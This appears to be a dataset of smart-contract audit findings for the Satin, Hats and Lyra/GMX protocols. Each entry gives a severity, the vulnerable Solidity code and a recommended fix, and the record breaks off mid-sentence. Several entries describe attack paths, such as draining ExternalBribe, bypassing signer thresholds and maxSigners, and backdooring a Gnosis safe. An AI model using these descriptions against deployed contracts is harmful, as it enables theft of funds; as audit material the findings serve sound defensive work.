lockEndTime is set to 0 whenever a user withdraws a veSatin by calling `withdraw()` or merges one by calling `merge()`. When this is the case the operation lockEndTime - weekCursor underflows, thus reverting. This results in users being unable to claim veSatin emissions if they withdraw or merge it firstчIn the `withdraw()` and `merge()` functions, call `claim()` in VeDist.sol to claim emissions before setting the lock end timestamp to 0. In `merge()` this is only necessary for the veSatin passed as _fromчч```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -It's never possible to vote for new pools until setMaxVotesForPool() is calledчhighчThe function `_vote()` allows voting on a pool only when the current amount of votes plus the new votes is lower or equal to the value returned by _calculateMaxVotePossible():\\n```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), \"Max votes exceeded\");\\n```\\n\\nHowever, `_calculateMaxVotePossible()` returns 0 for every pool in which the variable maxVotesForPool has not been initialized, thus making `_vote()` revert:\\n```\\n return ((totalVotingPower * maxVotesForPool[_pool]) / 100);\\n```\\nчIn `createGauge()` and `createGauge4Pool()` set maxVotesForPool for the pool the gauge is being created for to 100.чч```\\n require(_poolWeights <= _calculateMaxVotePossible(_pool), \"Max votes exceeded\");\\n```\\n -The protocol might transfer extra SATIN emissions to veSatin holders potentially making SatinVoter.sol insolventчhighчThe function `_distribute()` in SatinVoter.sol is generally responsible for distributing weekly emissions to a gauge based on the percentage of total votes the associated pool received. In particular, it's called by `updatePeriod()` (as per fix TRST-H-4) on the gauge associated with the Satin / $CASH pool. The variable veShare is set to be equal to the returned value of `calculateSatinCashLPVeShare()`, which is calculated as the percentage of Satin / $CASH LP times claimable[gauge] and represents the amount of SATIN that will be transferred to VeDist.sol when checkpointing emissions in checkpointEmissions():\\n```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n\\nHowever, when the if condition (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) is false the variable claimable[_gauge] will not be set to 0, meaning the next time veShare will be calculated it will include emissions that have already been distributed, potentially making SatinVoter.sol insolventчAdjust claimable[gauge] after calculating veShare and calculate veShare only if the msg.sender is SatinMinter.sol to prevent potential attackers from manipulating the value by repeatedly calling _distribute():\\n```\\n if (SATIN_CASH_LP_GAUGE == _gauge && msg.sender == minter) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n claimable[_gauge] -= veShare;\\n _claimable -= veShare;\\n }\\n```\\nчч```\\n uint _claimable = claimable[_gauge];\\n if (SATIN_CASH_LP_GAUGE == _gauge) {\\n veShare = calculateSatinCashLPVeShare(_claimable);\\n _claimable -= veShare;\\n }\\n if (_claimable > IMultiRewardsPool(_gauge).left(token) && _claimable / DURATION > 0) {\\n claimable[_gauge] = 0;\\n if (is4poolGauge[_gauge]) {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, true);\\n } else {\\n IGauge(_gauge).notifyRewardAmount(token, _claimable, false);\\n }\\n emit DistributeReward(msg.sender, _gauge, _claimable);\\n }\\n```\\n -It's possible to drain all the funds from ExternalBribeчhighчThe function `earned()` is used to calculate the amount rewards owed to a tokenId, to do so it performs a series operations over a loop and then it always executes:\\n```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n\\nwhich adds to reward the amount of rewards earned by the tokenId during the last epoch in which it was used to vote, but only if that happened at least a week prior (block.timestamp > _lastEpochEnd). Because of this, it's possible to call `earned()` multiple times in a row with a tokenId that voted more than a week before to drain the contract funds.чThe function `earned()` is taken from the Velodrome protocol and is known to have issues. Because it uses the convoluted logic of looping over votes to calculate the rewards per epoch instead of looping over epochs, we recommend using the Velodrome fixed implementation, which we reviewed:\\n```\\n function earned(address token, uint tokenId) public view returns (uint) {\\n if (numCheckpoints[tokenId] == 0) {\\n return 0;\\n }\\n uint reward = 0;\\n uint _ts = 0;\\n uint _bal = 0;\\n uint _supply = 1;\\n uint _index = 0;\\n uint _currTs = _bribeStart(lastEarn[token][tokenId]); // take epoch last claimed in as starting point\\n _index = getPriorBalanceIndex(tokenId, _currTs);\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // accounts for case where lastEarn is before first checkpoint\\n _currTs = Math.max(_currTs, _bribeStart(_ts));\\n // get epochs between current epoch and first checkpoint in same epoch as last claim\\n uint numEpochs = (_bribeStart(block.timestamp) - _currTs) / DURATION;\\n if (numEpochs > 0) {\\n for (uint256 i = 0; i < numEpochs; i++) {\\n // get index of last checkpoint in this epoch\\n _index = getPriorBalanceIndex(tokenId, _currTs + DURATION);\\n // get checkpoint in this epoch\\n _ts = checkpoints[tokenId][_index].timestamp;\\n _bal = checkpoints[tokenId][_index].balanceOf;\\n // get supply of last checkpoint in this epoch\\n _supply = supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION)].supply;\\n reward += _bal * tokenRewardsPerEpoch[token][_currTs] / _supply;\\n _currTs += DURATION;\\n }\\n }\\n return reward;\\n }\\n```\\nчч```\\n Checkpoint memory cp = checkpoints[tokenId][_endIndex];\\n uint _lastEpochStart = _bribeStart(cp.timestamp);\\n uint _lastEpochEnd = _lastEpochStart + DURATION;\\n if (block.timestamp > _lastEpochEnd) {\\n reward += (cp.balanceOf * \\n tokenRewardsPerEpoch[token][_lastEpochStart]) /\\n supplyCheckpoints[getPriorSupplyIndex(_lastEpochEnd)].supply;\\n```\\n -Division by 0 can freeze emissions claims for veSatin holdersчmediumчThe function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. In doing so, this code is executed (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nThe variable veSupply[weekCursor] is used as a denominator without checking if it's 0, which could make the function revert. If the protocol ever reaches a state where veSupply[weekCursor] is 0, all the claims for veSatin that were locked during that week would fail for both past and future claims. The same issue is present in the function `_calculateEmissionsClaim()`чEnsure veSupply[weekCursor] is not 0 when performing the division.чч```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -BaseV1Pair could break because of overflowчmediumчIn the function _update(), called internally by `mint()`, `burn()` and `swap()`, the following code is executed:\\n```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n\\nThis is forked from UniswapV2 source code, and it's meant and known to overflow. It works fine if solidity < 0.8.0 is used but reverts when solidity >= 0.8.0 is used. If this happens all the core functionalities of the pool would break, including `mint()`, `burn()`, and `swap()`.чWrap the operation around an unchecked{} block so that when the variable overflows it loops back to 0 instead of reverting.чч```\\n uint256 timeElapsed = blockTimestamp - blockTimestampLast;\\n // overflow is desired\\n if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n reserve0CumulativeLast += _reserve0 * timeElapsed;\\n reserve1CumulativeLast += _reserve1 * timeElapsed;\\n }\\n```\\n -createGauge4Pool() lacks proper checks and/or access controlчmediumчThe function createGauge4Pool() can be called by anybody at any time and is used to create a Gauge for a special pool, the 4pool. It takes 5 parameters as inputs:\\n```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n\\nNone of the parameters are properly sanitized, meaning _dai, _usdc, _usdt, _cash could be any whitelisted token and not necessarily DAI, USDC, USDT, and cash while _4pool could be any custom contract, including a malicious one. The function also sets the variable FOUR_POOL_GAUGE_ADDRESS to the newly created gauge, overwriting the previous value.чMake the function only callable by an admin, and if it can be called multiple times, turn the variable FOUR_POOL_GAUGE_ADDRESS to a mapping from address to boolean to support multiple 4 pools.чч```\\n function createGauge4pool(\\n address _4pool,\\n address _dai,\\n address _usdc,\\n address _usdt,\\n address _cash\\n ) external returns (address) {\\n```\\n -The logic in _calculateClaim() can leave some tokens locked and waste gasчlowчThe function `_calculateClaim()` is responsible for the calculations of the amount of emissions a specific veSatin is entitled to claim. To do so, this code is executed in a loop for each week from the current timestamp to the last claim (code with mitigation from TRST-H-1):\\n```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n\\nWhen the if condition is not met two things happen:\\nAn amount of emissions that was supposed to be distributed ((balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor])) is skipped, meaning it will stay locked in the contract.\\nThe function `_calculateClaim()` will loop for the maximum number of times (50), because weekCursor is not increased, wasting users' gas.чWhen the if condition is not met burn the tokens that were supposed to be distributed and exit the loop. Since the non-distributed tokens would stay locked it's not strictly necessary to burn them.чч```\\n if ((lockEndTime - weekCursor) > (minLockDurationForReward)) {\\n toDistribute +=\\n (balanceOf * tokensPerWeek[weekCursor]) / veSupply[weekCursor];\\n weekCursor += WEEK;\\n }\\n```\\n -More than one hat of the same hatId can be assigned to a userчhighчHats are minted internally using `_mintHat()`.\\n```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n\\nAs documentation states, it is unsafe if _wearer already has the hatId. However, this could easily be the case when called from `mintHat()`.\\n```\\n function mintHat(uint256 _hatId, address _wearer) public returns (bool) {\\n Hat memory hat = _hats[_hatId];\\n if (hat.maxSupply == 0) revert HatDoesNotExist(_hatId);\\n // only the wearer of a hat's admin Hat can mint it\\n _checkAdmin(_hatId);\\n if (hat.supply >= hat.maxSupply) {\\n revert AllHatsWorn(_hatId);\\n }\\n if (isWearerOfHat(_wearer, _hatId)) {\\n revert AlreadyWearingHat(_wearer, _hatId);\\n }\\n _mintHat(_wearer, _hatId);\\n return true;\\n }\\n```\\n\\nThe function validates _wearer doesn't currently wear the hat, but its balance could still be over 0, if the hat is currently toggled off or the wearer is not eligible. The impact is that the hat supply is forever spent, while nobody actually received the hat. This could be used maliciously or occur by accident. When the hat is immutable, the max supply can never be corrected for this leak. It could be used to guarantee no additional, unfriendly hats can be minted to maintain permanent power.чInstead of checking if user currently wears the hat, check if its balance is over 0.чч```\\n /// @notice Internal call to mint a Hat token to a wearer\\n /// @dev Unsafe if called when `_wearer` has a non-zero balance of `_hatId`\\n /// @param _wearer The wearer of the Hat and the recipient of the newly minted token\\n /// @param _hatId The id of the Hat to mint\\n function _mintHat(address _wearer, uint256 _hatId) internal {\\n unchecked {\\n // should not overflow since `mintHat` enforces max balance of 1\\n _balanceOf[_wearer][_hatId] = 1;\\n // increment Hat supply counter\\n // should not overflow given AllHatsWorn check in `mintHat` ++_hats[_hatId].supply;\\n }\\n emit TransferSingle(msg.sender, address(0), _wearer, _hatId, 1);\\n }\\n```\\n -TXs can be executed by less than the minimum required signaturesчhighчIn HatsSignerGateBase, `checkTransaction()` is the function called by the Gnosis safe to approve the transaction. Several checks are in place.\\n```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe first check is that the number of owners registered on the safe is at least minThreshold. The second check is that the number of valid signatures (wearers of relevant hats) is not below the safe's threshold. However, it turns out these requirements are not sufficient. A possible situation is that there are plenty of owners registered, but currently most do not wear a hat. `reconcileSignerCount()` could be called to reduce the safe's threshold to the current validSigCount, which can be below minThreshold. That would make both the first and second check succeed. However, minThreshold is defined to be the smallest number of signers that must come together to make a TX. The result is that a single signer could execute a TX on the safe, if the other signers are not wearers of hats (for example, their toggle has been temporarily set off in the case of multi-hat signer gate.чAdd another check in `checkTransaction()`, which states that validSigCount >= minThreshold.чч```\\n uint256 safeOwnerCount = safe.getOwners().length;\\n if (safeOwnerCount < minThreshold) {\\n revert BelowMinThreshold(minThreshold, safeOwnerCount);\\n }\\n```\\n -Target signature threshold can be bypassed leading to minority TXsчhighч`checkTransaction()` is the enforcer of the HSG logic, making sure signers are wearers of hats and so on. The check below makes sure sufficient hat wearers signed the TX:\\n```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n\\nThe issue is that the safe's threshold is not guaranteed to be up to date. For example, initially there were 5 delegated signers. At some point, three lost eligibility. `reconcileSignerCount()` is called to update the safe's threshold to now have 2 signers. At a later point, the three signers which lost eligibility regained it. At this point, the threshold is still two, but there are 5 valid signers, so if targetThreshold is not below 5, they should all sign for a TX to be executed. That is not the case, as the old threshold is used. There are various scenarios which surface the lack of synchronization between the wearer status and safe's stored threshold.чCall `reconcileSignerCount()` before the validation code in `checkTransaction()`.чч```\\n uint256 validSigCount = countValidSignatures(txHash, signatures, signatures.length / 65);\\n // revert if there aren't enough valid signatures\\n if (validSigCount < safe.getThreshold()) {\\n revert InvalidSigners();\\n }\\n```\\n -maxSigners can be bypassedчhighчmaxSigners is specified when creating an HSG and is left constant. It is enforced in two ways -targetThreshold may never be set above it, and new signers cannot register to the HSG when the signer count reached maxSigners. Below is the implementation code in HatsSignerGate.\\n```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n\\nAn issue that arises is that this doesn't actually limit the number of registered signers. Indeed, signerCount is a variable that can fluctuate when wearers lose eligibility or a hat is inactive. At this point, `reconcileSignerCount()` can be called to update the signerCount to the current valid wearer count. A simple attack which achieves unlimited claims is as follows:\\nAssume maxSigners = 10\\n10 signers claim their spot, so signerCount is maxed out\\nA signer misbehaves, loses eligibility and the hat.\\nreconcile() is called, so signerCount is updated to 9\\nA new signer claims, making signerCount = 10\\nThe malicious signer behaves nicely and regains the hat.\\nreconcile() is called again, making signerCount = 11\\nAt this point, any eligible hat wearer can claim their hat, easily overrunning the maxSigners restriction.чThe root cause is that users which registered but lose their hat are still stored in the safe's owners array, meaning they can always get re-introduced and bump the signerCount. Instead of checking the signerCount, a better idea would be to compare with the list of owners saved on the safe. If there are owners that are no longer holders, `removeSigner()` can be called to vacate space for new signers.чч```\\n function claimSigner() public virtual {\\n if (signerCount == maxSigners) {\\n revert MaxSignersReached();\\n }\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n _grantSigner(msg.sender);\\n }\\n```\\n -Attacker can DOS minting of new top hats in low-fee chainsчmediumчIn Hats protocol, anyone can be assigned a top hat via the `mintTopHat()` function. The top hats are structured with top 32 bits acting as a domain ID, and the lower 224 bits are cleared. There are therefore up to 2^32 = ~ 4 billion top hats. Once they are all consumed, `mintTopHat()` will always fail:\\n```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n\\nThis behavior exposes the project to a DOS vector, where an attacker can mint 4 billion top hats in a loop and make the function unusable, forcing a redeploy of Hats protocol. This is unrealistic on ETH mainnet due to gas consumption, but definitely achievable on the cheaper L2 networks. As the project will be deployed on a large variety of EVM blockchains, this poses a significant risk.чRequire a non-refundable deposit fee (paid in native token) when minting a top hat. Price it so that consuming the 32-bit space will be impossible. This can also serve as a revenue stream for the Hats project.чч```\\n // uint32 lastTopHatId will overflow in brackets\\n topHatId = uint256(++lastTopHatId) << 224;\\n```\\n -Linking of hat trees can freeze hat operationsчmediumчHats support tree-linking, where hats from one node link to the first level of a different domain. This way, the amount of levels for the linked-to tree increases by the linked-from level count. This is generally fine, however lack of checking of the new total level introduces severe risks.\\n```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n\\nThe `getHatLevel()` function can only return up to level 255. It is used by the `checkAdmin()` call used in many of the critical functions in the Hats contract. Therefore, if for example, 17 hat domains are joined together in the most stretched way possible, It would result in a correct hat level of 271, making this calculation revert:\\n```\\n if (treeAdmin != 0) {\\n return 1 + uint8(i) + getHatLevel(treeAdmin);\\n }\\n```\\n\\nThe impact is that intentional or accidental linking that creates too many levels would freeze the higher hat levels from any interaction with the contract.чIt is recommended to add a check in `_linkTopHatToTree()`, that the new accumulated level can fit in uint8. Another option would be to change the maximum level type to uint32.чч```\\n /// @notice Identifies the level a given hat in its hat tree\\n /// @param _hatId the id of the hat in question\\n /// @return level (0 to type(uint8).max)\\n function getHatLevel(uint256 _hatId) public view returns (uint8) {\\n```\\n -Attacker can make a signer gate creation failчmediumчDAOs can deploy a HSG using `deployHatsSignerGateAndSafe()` or deployMultiHatsSignerGateAndSafe().The parameters are encoded and passed to moduleProxyFactory.deployModule():\\n```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(\"setUp(bytes)\", \\n initializeParams), _saltNonce );\\n```\\n\\nThis function will call createProxy():\\n```\\n proxy = createProxy( masterCopy, keccak256(abi.encodePacked(keccak256(initializer), saltNonce)) );\\n```\\n\\nThe second parameter is the generated salt, which is created from the initializer and passed saltNonce. Finally `createProxy()` will use CREATE2 to create the contract:\\n```\\n function createProxy(address target, bytes32 salt) internal returns (address result)\\n {\\n if (address(target) == address(0)) revert ZeroAddress(target);\\n if (address(target).code.length == 0) revert \\n TargetHasNoCode(target);\\n bytes memory deployment = abi.encodePacked(\\n hex\"602d8060093d393df3363d3d373d3d3d363d73\", target, hex\"5af43d82803e903d91602b57fd5bf3\" );\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n result := create2(0, add(deployment, 0x20), \\n mload(deployment), salt)\\n }\\n if (result == address(0)) revert TakenAddress(result);\\n }\\n```\\n\\nAn issue could be that an attacker can frontrun the creation TX with their own creation request, with the same parameters. This would create the exact address created by the CREATE2 call, since the parameters and therefore the final salt will be the same. When the victim's transaction would be executed, the address is non-empty so the EVM would reject its creation. This would result in a bad UX for a user, who thinks the creation did not succeed. The result contract would still be usable, but would be hard to track as it was created in another TX.чUse an ever-increasing nonce counter to guarantee unique contract addresses.чч```\\n bytes memory initializeParams = abi.encode(_ownerHatId, _signersHatId, _safe, hatsAddress, _minThreshold, \\n _targetThreshold, _maxSigners, version );\\n hsg = moduleProxyFactory.deployModule(hatsSignerGateSingleton, abi.encodeWithSignature(\"setUp(bytes)\", \\n initializeParams), _saltNonce );\\n```\\n -Signers can backdoor the safe to execute any transaction in the future without consensusчmediumчThe function `checkAfterExecution()` is called by the safe after signer's request TX was executed (and authorized). It mainly checks that the linkage between the safe and the HSG has not been compromised.\\n```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n\\nHowever, it is missing a check that no new modules have been introduced to the safe. When modules execute TXs on a Gnosis safe, the guard safety callbacks do not get called. As a result, any new module introduced is free to execute whatever it wishes on the safe. It constitutes a serious backdoor threat and undermines the HSG security model.чCheck that no new modules have been introduced to the safe, using the `getModulesPaginated()` utility.чч```\\n function checkAfterExecution(bytes32, bool) external override {\\n if (abi.decode(StorageAccessible(address(safe)).getStorageAt(uint256(GUARD_STORAGE_SLOT), 1), (address))\\n != address(this)) \\n {\\n revert CannotDisableThisGuard(address(this));\\n }\\n if (!IAvatar(address(safe)).isModuleEnabled(address(this))) {\\n revert CannotDisableProtectedModules(address(this));\\n }\\n if (safe.getThreshold() != _correctThreshold()) {\\n revert SignersCannotChangeThreshold();\\n }\\n // leave checked to catch underflows triggered by re-erntry\\n attempts\\n --guardEntries;\\n }\\n```\\n -createHat does not detect MAX_LEVEL admin correctlyчlowчIn `createHat()`, the contract checks user is not minting hats for the lowest hat tier:\\n```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n\\nThe issue is that it does not check for max level correctly, as it looks only at the lowest 8 bits. Each level is composed of 16 bits, so ID xx00 would pass this check. Fortunately, although the check is passed, the function will revert later. The call to `getNextId(_admin)` will return 0 for max-level admin, and _checkAdmin(0) is guaranteed to fail. However, the check should still be fixed as it is not exploitable only by chance.чChange the conversion to uint16.чч```\\n function createHat( uint256 _admin, string memory _details, uint32 _maxSupply, address _eligibility,\\n address _toggle, bool _mutable, string memory _imageURI) \\n public returns (uint256 newHatId) {\\n if (uint8(_admin) > 0) {\\n revert MaxLevelsReached();\\n }\\n ….\\n }\\n```\\n -Incorrect imageURI is returned for hats in certain casesчlowчFunction `getImageURIForHat()` should return the most relevant imageURI for the requested hatId. It will iterate backwards from the current level down to level 0, and return an image if it exists for that level.\\n```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n\\nIt can be observed that the loop body will not run for level 0. When the loop is finished, the code just returns the baseImageURI, which is a Hats-level fallback, rather than top hat level fallback. As a result, the image displayed will not be correct when querying for a level above 0, when all levels except level 0 have no registered image.чBefore returning the baseImageURI, check if level 0 admin has a registered image.чч```\\n function getImageURIForHat(uint256 _hatId) public view returns (string memory) {\\n // check _hatId first to potentially avoid the `getHatLevel` call\\n Hat memory hat = _hats[_hatId];\\n string memory imageURI = hat.imageURI; // save 1 SLOAD\\n // if _hatId has an imageURI, we return it\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // otherwise, we check its branch of admins\\n uint256 level = getHatLevel(_hatId);\\n // but first we check if _hatId is a tophat, in which case we fall back to the global image uri\\n if (level == 0) return baseImageURI;\\n // otherwise, we check each of its admins for a valid imageURI\\n uint256 id;\\n // already checked at `level` above, so we start the loop at `level - 1`\\n for (uint256 i = level - 1; i > 0;) {\\n id = getAdminAtLevel(_hatId, uint8(i));\\n hat = _hats[id];\\n imageURI = hat.imageURI;\\n if (bytes(imageURI).length > 0) {\\n return imageURI;\\n }\\n // should not underflow given stopping condition is > 0\\n unchecked {\\n --i;\\n }\\n }\\n // if none of _hatId's admins has an imageURI of its own, we \\n again fall back to the global image uri\\n return baseImageURI;\\n }\\n```\\n -Fetching of hat status may fail due to lack of input sanitizationчlowчThe functions `_isActive()` and `_isEligible()` are used by `balanceOf()` and other functions, so they should not ever revert. However, they perform ABI decoding from external inputs.\\n```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(\"getHatStatus(uint256)\", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n\\nIf toggle returns invalid return data (whether malicious or by accident), `abi.decode()` would revert causing the entire function to revert.чWrap the decoding operation for both affected functions in a try/catch statement. Fall back to the `_getHatStatus()` result if necessary. Checking that returndata size is correct is not enough as bool encoding must be 64-bit encoded 0 or 1.чч```\\n function _isActive(Hat memory _hat, uint256 _hatId) internal view returns (bool) {\\n bytes memory data = \\n abi.encodeWithSignature(\"getHatStatus(uint256)\", _hatId);\\n (bool success, bytes memory returndata) = \\n _hat.toggle.staticcall(data);\\n if (success && returndata.length > 0) {\\n return abi.decode(returndata, (bool));\\n } else {\\n return _getHatStatus(_hat);\\n }\\n }\\n```\\n -Attacker can take over GMXAdapter implementation contractчlowчGMXAdapter inherits from BaseExchangeAdapter. It is an implementation contract for a transparent proxy and has the following initializer:\\n```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n\\nTherefore, an attacker can call initialize() on the implementation contract and become the owner. At this point they can do just about anything to this contract, but it has no impact on the proxy as it is using separate storage. If there was a delegatecall coded in GMXAdapter, attacker could have used it to call an attacker's contract and execute the SELFDESTRUCT opcode, killing the implementation. With no implementation, the proxy itself would not be functional until it is updated to a new implementation. It is ill-advised to allow anyone to have control over implementation contracts as future upgrades may make the attack surface exploitable.чThe standard approach is to call from the constructor the _disableInitializers() from Open Zeppelin's Initializable moduleчч```\\n function initialize() external initializer {\\n __Ownable_init();\\n }\\n```\\n -disordered fee calculated causes collateral changes to be inaccurateчhighч`_increasePosition()` changes the Hedger's GMX position by sizeDelta amount and collateralDelta collateral. There are two collateralDelta corrections - one for swap fees and one for position fees. Since the swap fee depends on up-to-date collateralDelta, it's important to calculate it after the position fee, contrary to the current state. In practice, it may lead to the leverage ratio being higher than intended as collateralDelta sent to GMX is lower than it should be.\\n```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\nчFlip the order of `getSwapFeeBP()` and `_getPositionFee()`.чч```\\n if (isLong) {\\n uint swapFeeBP = getSwapFeeBP(isLong, true, collateralDelta);\\n collateralDelta = (collateralDelta * (BASIS_POINTS_DIVISOR + swapFeeBP)) / BASIS_POINTS_DIVISOR;\\n }\\n // add margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\n -small LP providers may be unable to withdraw their depositsчmediumчIn LiquidityPool's initiateWithdraw(), it's required that withdrawn value is above a minimum parameter, or that withdrawn tokens is above the minimum parameter.\\n```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n\\nThe issue is that minDepositWithdraw is measured in dollars while amountLiquidityToken is LP tokens. The intention was that if LP tokens lost value and a previous deposit is now worth less than minDepositWithdraw, it would still be withdrawable. However, the current implementation doesn't check for that correctly, since the LP to dollar exchange rate at deposit time is not known, and is practically being hardcoded as 1:1 here. The impact is that users may not be able to withdraw LP with the token amount that was above the minimum at deposit time, or vice versaчConsider calculating an average exchange rate at which users have minted and use it to 